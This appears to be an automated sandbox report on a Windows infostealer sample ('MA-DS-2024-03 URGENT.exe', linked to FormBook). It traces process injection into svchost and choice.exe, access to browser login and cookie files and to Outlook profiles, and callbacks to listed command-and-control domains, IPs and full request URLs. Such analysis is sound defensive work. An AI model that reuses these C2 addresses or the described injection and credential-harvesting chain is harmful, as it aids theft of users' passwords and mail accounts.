                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtProtectVirtualMemory: Direct from: 0x77762F9C
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\choice.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\choice.exe | Section loaded: NULL target: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe protection: read write
                Source: C:\Windows\SysWOW64\choice.exe | Section loaded: NULL target: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\choice.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\choice.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\choice.exe | Thread register set: target process: 3724
                Source: C:\Windows\SysWOW64\choice.exe | Thread APC queued: target process: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2DB4008
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_004587B1 LogonUserW
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00464C53 mouse_event
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe"
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | Process created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"
                Source: C:\Windows\SysWOW64\choice.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: MA-DS-2024-03 URGENT.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: MA-DS-2024-03 URGENT.exe, fbLIkXRoMf.exe, 00000010.00000000.1676349725.0000000001810000.00000002.00000001.00040000.00000000.sdmp, fbLIkXRoMf.exe, 00000010.00000002.2503279303.0000000001811000.00000002.00000001.00040000.00000000.sdmp, fbLIkXRoMf.exe, 00000012.00000000.1848401503.00000000012C0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: fbLIkXRoMf.exe, 00000010.00000000.1676349725.0000000001810000.00000002.00000001.00040000.00000000.sdmp, fbLIkXRoMf.exe, 00000010.00000002.2503279303.0000000001811000.00000002.00000001.00040000.00000000.sdmp, fbLIkXRoMf.exe, 00000012.00000000.1848401503.00000000012C0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: fbLIkXRoMf.exe, 00000010.00000000.1676349725.0000000001810000.00000002.00000001.00040000.00000000.sdmp, fbLIkXRoMf.exe, 00000010.00000002.2503279303.0000000001811000.00000002.00000001.00040000.00000000.sdmp, fbLIkXRoMf.exe, 00000012.00000000.1848401503.00000000012C0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ?Program Manager
                Source: fbLIkXRoMf.exe, 00000010.00000000.1676349725.0000000001810000.00000002.00000001.00040000.00000000.sdmp, fbLIkXRoMf.exe, 00000010.00000002.2503279303.0000000001811000.00000002.00000001.00040000.00000000.sdmp, fbLIkXRoMf.exe, 00000012.00000000.1848401503.00000000012C0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0042862B cpuid
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\AppVClient.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00441E06 GetUserNameW
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

                Source: Yara match | File source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000004.00000002.1775163811.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.2504438586.0000000004250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.2499870551.0000000002370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.2505900550.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1774789087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1775699573.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.2504146589.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.2504310648.0000000004220000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\choice.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\choice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\choice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\choice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\choice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\choice.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\choice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\choice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\choice.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: MA-DS-2024-03 URGENT.exe | Binary or memory string: WIN_81
                Source: MA-DS-2024-03 URGENT.exe | Binary or memory string: WIN_XP
                Source: MA-DS-2024-03 URGENT.exe | Binary or memory string: WIN_XPe
                Source: MA-DS-2024-03 URGENT.exe | Binary or memory string: WIN_VISTA
                Source: MA-DS-2024-03 URGENT.exe | Binary or memory string: WIN_7
                Source: MA-DS-2024-03 URGENT.exe | Binary or memory string: WIN_8
                Source: MA-DS-2024-03 URGENT.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                Source: Yara match | File source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000004.00000002.1775163811.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.2504438586.0000000004250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.2499870551.0000000002370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.2505900550.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1774789087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1775699573.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.2504146589.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.2504310648.0000000004220000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK matrix: matched techniques per tactic (each technique is followed by the count badge shown in its matrix cell)

Reconnaissance: none matched
Resource Development: none matched
Initial Access: Valid Accounts (2)
Execution: Native API (1), Service Execution (2)
Persistence: LSASS Driver (1), DLL Side-Loading (1), Valid Accounts (2), Windows Service (1)
Privilege Escalation: Exploitation for Privilege Escalation (1), Abuse Elevation Control Mechanism (1), LSASS Driver (1), DLL Side-Loading (1), Valid Accounts (2), Access Token Manipulation (21), Windows Service (1), Process Injection (412)
Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Abuse Elevation Control Mechanism (1), Obfuscated Files or Information (3), Software Packing (2), Timestomp (1), DLL Side-Loading (1), Masquerading (221), Valid Accounts (2), Virtualization/Sandbox Evasion (2), Access Token Manipulation (21), Process Injection (412)
Credential Access: OS Credential Dumping (1), Input Capture (21)
Discovery: System Time Discovery (2), Account Discovery (1), File and Directory Discovery (2), System Information Discovery (126), Security Software Discovery (251), Virtualization/Sandbox Evasion (2), Process Discovery (3), Application Window Discovery (11), System Owner/User Discovery (1)
Lateral Movement: Taint Shared Content (1)
Collection: Archive Collected Data (1), Data from Local System (1), Email Collection (1), Input Capture (21), Clipboard Data (3)
Command and Control: Ingress Tool Transfer (4), Encrypted Channel (1), Non-Application Layer Protocol (4), Application Layer Protocol (4)
Exfiltration: none matched
Impact: System Shutdown/Reboot (1)
Behavior Graph (ID: 1572587; Sample: MA-DS-2024-03 URGENT.exe; Startdate: 10/12/2024; Architecture: WINDOWS; Score: 100)

Start (node 2): contacts www.snyp.shop, www.8312zcksnu.bond and 5 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 7 other signatures. Started processes: MA-DS-2024-03 URGENT.exe (node 10), AppVClient.exe (node 15), alg.exe (node 17), 4 other processes (node 19).

Node 10, MA-DS-2024-03 URGENT.exe: contacts pywolwnvd.biz (54.244.188.177, ports 49699, 80; AMAZON-02US, United States). Dropped files: C:\Windows\System32\alg.exe (PE32+); DiagnosticsHub.Sta...llector.Service.exe (PE32+); C:\Windows\System32\AppVClient.exe (PE32+); C:\Program Files (x86)\...\armsvc.exe (PE32). Signatures: Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; 3 other signatures. Starts svchost.exe (node 21).

Node 15, AppVClient.exe: Antivirus detection for dropped file; Creates files in the system32 config directory; Machine Learning detection for dropped file.

Node 21, svchost.exe: Maps a DLL or memory area into another process. Injects into fbLIkXRoMf.exe (node 24).

Node 24, fbLIkXRoMf.exe (injected): Found direct / indirect Syscall (likely to bypass EDR). Starts choice.exe (node 27).

Node 27, choice.exe: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures. Injects into fbLIkXRoMf.exe (node 30); starts firefox.exe (node 34).

Node 30, fbLIkXRoMf.exe (injected): contacts d48dk.top (154.23.184.207, ports 49857, 49863, 49870; COGENT-174US, United States), www.8312zcksnu.bond (38.165.29.234, ports 49896, 49902, 49908; COGENT-174US, United States) and 2 other IPs or domains. Found direct / indirect Syscall (likely to bypass EDR).

Source | Detection | Scanner | Label
MA-DS-2024-03 URGENT.exe | 82% | ReversingLabs | Win32.Virus.Expiro
MA-DS-2024-03 URGENT.exe | 100% | Avira | W32/Infector.Gen
MA-DS-2024-03 URGENT.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\System32\AppVClient.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\System32\alg.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML |
C:\Windows\System32\AppVClient.exe | 100% | Joe Sandbox ML |
C:\Windows\System32\alg.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
http://www.d48dk.top/9ffw/?66Sxjp=tAagZsHUdJyyT40ohv2IEKVVuTBc1VBL1ZYJ8ve7IxnIk8U1vVUcZfnPN6bfj6aG1UJ/NhZtBjoMrT4UOPB/fS/App7EdCeX7snBTGyVcR6uHi6nECuo9X1MxomcvUl4vhP9y31uTQC7&PNE=e0RPRf4HVNE | 0% | Avira URL Cloud | safe
http://www.8312zcksnu.bond/d3gs/?66Sxjp=klKY6dvkP+O30B+HpvvIDDpax0dTsaw1cNmHC/CObJBnEjCTb6SXj4/f8yRqIefmit/6AMXcJNK+4aPls5ALd9I9cQRWlWRfEGaG8Rwz/2lSBqGTy2oz+0b8ie3FY95QYv/bX6Bmf7b1&PNE=e0RPRf4HVNE | 0% | Avira URL Cloud | safe
http://www.snyp.shop | 0% | Avira URL Cloud | safe
https://whois.gandi.net/en/results?search=sunnyz.store | 0% | Avira URL Cloud | safe
http://www.snyp.shop/4nyz/?66Sxjp=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLfAVgne3fDPNZyA8jfWq2da7UT45q0fw1b8SX8H1e/LnrcRFlX9om2hRo&PNE=e0RPRf4HVNE | 0% | Avira URL Cloud | safe
http://www.d48dk.top/9ffw/ | 0% | Avira URL Cloud | safe
http://54.244.188.177:80/usxsp | 0% | Avira URL Cloud | safe
http://54.244.188.177/usxspa-t | 0% | Avira URL Cloud | safe
http://www.8312zcksnu.bond/d3gs/ | 0% | Avira URL Cloud | safe
http://www.snyp.shop/4nyz/ | 0% | Avira URL Cloud | safe
http://54.244.188.177/usxsp | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
webredir.vip.gandi.net | 217.70.184.50 | true | false | | high
www.snyp.shop | 13.248.169.48 | true | true | | unknown
d48dk.top | 154.23.184.207 | true | true | | unknown
www.8312zcksnu.bond | 38.165.29.234 | true | true | | unknown
pywolwnvd.biz | 54.244.188.177 | true | false | | high
www.sunnyz.store | unknown | unknown | false | | unknown
www.d48dk.top | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.d48dk.top/9ffw/?66Sxjp=tAagZsHUdJyyT40ohv2IEKVVuTBc1VBL1ZYJ8ve7IxnIk8U1vVUcZfnPN6bfj6aG1UJ/NhZtBjoMrT4UOPB/fS/App7EdCeX7snBTGyVcR6uHi6nECuo9X1MxomcvUl4vhP9y31uTQC7&PNE=e0RPRf4HVNE | true | Avira URL Cloud: safe | unknown
http://pywolwnvd.biz/usxsp | false | | high
http://www.snyp.shop/4nyz/ | true | Avira URL Cloud: safe | unknown
http://www.8312zcksnu.bond/d3gs/?66Sxjp=klKY6dvkP+O30B+HpvvIDDpax0dTsaw1cNmHC/CObJBnEjCTb6SXj4/f8yRqIefmit/6AMXcJNK+4aPls5ALd9I9cQRWlWRfEGaG8Rwz/2lSBqGTy2oz+0b8ie3FY95QYv/bX6Bmf7b1&PNE=e0RPRf4HVNE | true | Avira URL Cloud: safe | unknown
http://www.d48dk.top/9ffw/ | true | Avira URL Cloud: safe | unknown
http://www.8312zcksnu.bond/d3gs/ | true | Avira URL Cloud: safe | unknown
http://www.snyp.shop/4nyz/?66Sxjp=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLfAVgne3fDPNZyA8jfWq2da7UT45q0fw1b8SX8H1e/LnrcRFlX9om2hRo&PNE=e0RPRf4HVNE | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://hm.baidu.com/hm.js?74a9aceb7cac25dafa7a0b15cd8b5c9d | choice.exe, 00000011.00000002.2506611676.00000000072D0000.00000004.00000800.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2505224111.00000000051E8000.00000004.10000000.00040000.00000000.sdmp, fbLIkXRoMf.exe, 00000012.00000002.2504606798.0000000003398000.00000004.00000001.00040000.00000000.sdmp | false | | high
http://54.244.188.177/usxspa-t | MA-DS-2024-03 URGENT.exe, 00000000.00000002.1286891112.0000000000AA5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://whois.gandi.net/en/results?search=sunnyz.store | choice.exe, 00000011.00000002.2505224111.0000000004EC4000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000011.00000002.2506611676.00000000072D0000.00000004.00000800.00020000.00000000.sdmp, fbLIkXRoMf.exe, 00000012.00000002.2504606798.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2080181573.000000002CD34000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.gandi.net/en/domain | choice.exe, 00000011.00000002.2505224111.0000000004EC4000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000011.00000002.2506611676.00000000072D0000.00000004.00000800.00020000.00000000.sdmp, fbLIkXRoMf.exe, 00000012.00000002.2504606798.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2080181573.000000002CD34000.00000004.80000000.00040000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://54.244.188.177/ | MA-DS-2024-03 URGENT.exe, 00000000.00000002.1287315581.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://54.244.188.177:80/usxsp | MA-DS-2024-03 URGENT.exe, 00000000.00000002.1287315581.0000000000B89000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.snyp.shop | fbLIkXRoMf.exe, 00000012.00000002.2505900550.000000000514B000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://54.244.188.177/usxsp | MA-DS-2024-03 URGENT.exe, 00000000.00000002.1286891112.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000002.1286891112.0000000000AA5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
13.248.169.48 | www.snyp.shop | United States | 16509 | AMAZON-02US | true
38.165.29.234 | www.8312zcksnu.bond | United States | 174 | COGENT-174US | true
54.244.188.177 | pywolwnvd.biz | United States | 16509 | AMAZON-02US | false
217.70.184.50 | webredir.vip.gandi.net | France | 29169 | GANDI-ASDomainnameregistrar-httpwwwgandinetFR | false
154.23.184.207 | d48dk.top | United States | 174 | COGENT-174US | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1572587
Start date and time: 2024-12-10 17:58:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 19
Number of new started drivers analysed: 3
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: MA-DS-2024-03 URGENT.exe
Detection: MAL
Classification: mal100.spre.troj.spyw.evad.winEXE@10/11@5/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 78%
• Number of executed functions: 75
• Number of non-executed functions: 243
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• VT rate limit hit for: MA-DS-2024-03 URGENT.exe
Time | Type | Description
13:34:23 | API Interceptor | 297587x Sleep call for process: choice.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
13.248.169.48 | Recibos.exe | malicious | FormBook | www.egyshare.xyz/lp5b/
13.248.169.48 | AWB_5771388044 Documente de expediere.exe | malicious | FormBook | www.avalanchefi.xyz/ctta/
13.248.169.48 | AWB_5771388044 Documente de expediere.exe | malicious | FormBook | www.avalanchefi.xyz/ctta/
13.248.169.48 | Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe | malicious | FormBook | www.hsa.world/09b7/
13.248.169.48 | MN1qo2qaJmEvXDP.exe | malicious | FormBook | www.lovel.shop/rxts/
13.248.169.48 | RFQ _ Virtue 054451000085.exe | malicious | FormBook | www.snyp.shop/4nyz/
13.248.169.48 | NEW.RFQ00876.pdf.exe | malicious | FormBook | www.krshop.shop/5p01/
13.248.169.48 | DHL_734825510.exe | malicious | FormBook | www.egyshare.xyz/440l/
13.248.169.48 | purchase order.exe | malicious | FormBook | www.aktmarket.xyz/wb7v/
13.248.169.48 | SRT68.exe | malicious | FormBook | www.avalanchefi.xyz/vxa5/
38.165.29.234 | RFQ _ Virtue 054451000085.exe | malicious | FormBook | www.8312zcksnu.bond/d3gs/
54.244.188.177 | Request for Quotation.exe | malicious | FormBook | cvgrf.biz/iropyruplkan
54.244.188.177 | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | cvgrf.biz/hfsfqfqbrwib
54.244.188.177 | PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | cvgrf.biz/npdqgsoqmq
54.244.188.177 | RFQ _ Virtue 054451000085.exe | malicious | FormBook | cvgrf.biz/rtjcy
54.244.188.177 | OgkJOmobY7.exe | malicious | FormBook | pywolwnvd.biz/hemfkj
54.244.188.177 | Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | pywolwnvd.biz/nwqf
54.244.188.177 | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | cvgrf.biz/yqmdwhskkjhif
54.244.188.177 | invoice_96.73.exe | malicious | FormBook | lrxdmhrr.biz/tgcwttfqletfhyq
54.244.188.177 | Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | rynmcq.biz/msoqwwrwyts
54.244.188.177 | C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | rynmcq.biz/qqnj
Match | Associated Sample Name / URL | Detection | Threat Name | Context
webredir.vip.gandi.net | RFQ _ Virtue 054451000085.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | QUOTATON-37839993.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | PO# 81136575.exe | malicious | DarkTortilla, FormBook | 217.70.184.50
webredir.vip.gandi.net | Order No 24.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | RFQ.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | statement of accounts.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | RFQ.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | RFQ.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | XhAQ0Rk63O.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | SWIFT.exe | malicious | FormBook | 217.70.184.50
www.8312zcksnu.bond | RFQ _ Virtue 054451000085.exe | malicious | FormBook | 38.165.29.234
www.snyp.shop | RFQ _ Virtue 054451000085.exe | malicious | FormBook | 13.248.169.48
pywolwnvd.biz | Request for Quotation.exe | malicious | FormBook | 54.244.188.177
pywolwnvd.biz | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 54.244.188.177
